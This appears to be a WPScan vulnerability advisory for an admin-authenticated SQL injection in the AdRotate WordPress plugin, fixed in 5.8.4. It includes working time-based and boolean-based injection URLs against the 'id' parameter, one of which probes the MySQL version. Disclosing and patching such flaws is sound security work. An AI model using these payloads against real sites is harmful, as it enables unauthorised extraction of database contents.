AdRotate < 5.8.4 - Authenticated SQL Injection



Description
Authenticated SQL injection in the AdRotate 5.8.3.1 exists via param "id". However, this requires an admin privileged user.

NOTE: The plugin author mistook this SQLi bug for XSS but the remedy remains OK.
Proof of Concept
Param "id" is vulneable to SQL Injeciton.

Example 1:
http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=1+AND+SLEEP%2810%29

Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=1 AND SLEEP(10)

This query will delay page load by 10 seconds

Example 2:
by using a boolean-based technique, one can extract info about the system.

http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=2+AND+1%3D%28SELECT+IF+%28+GREATEST%28+ORD%28MID%28%40%40version%2C+1%2C+1%29%29%2C+1%29+%3D+53%2C+1%2C+0%29%29

Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=2 AND 1=(SELECT IF ( GREATEST( ORD(MID(@@version, 1, 1)), 1) = 53, 1, 0))

This query will check if the first char of MySQL version is "5" or not.

Affects Plugin

fixed in version 5.8.4

References

URL https://ajdg.solutions/blog/adrotate-5-8-4-security-update/
URL https://plugins.trac.wordpress.org/changeset/2316932/adrotate

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter Nguyen Anh Tien
Submitter Website https://research.sun-asterisk.com/
Submitter Twitter https://twitter.com/vigov5
Views 20616
Verified No
WPVDB ID 10249

Timeline

Publicly Published 2020-06-03 (about 1 month ago)
Added 2020-06-03 (about 1 month ago)
Last Updated 2020-06-04 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin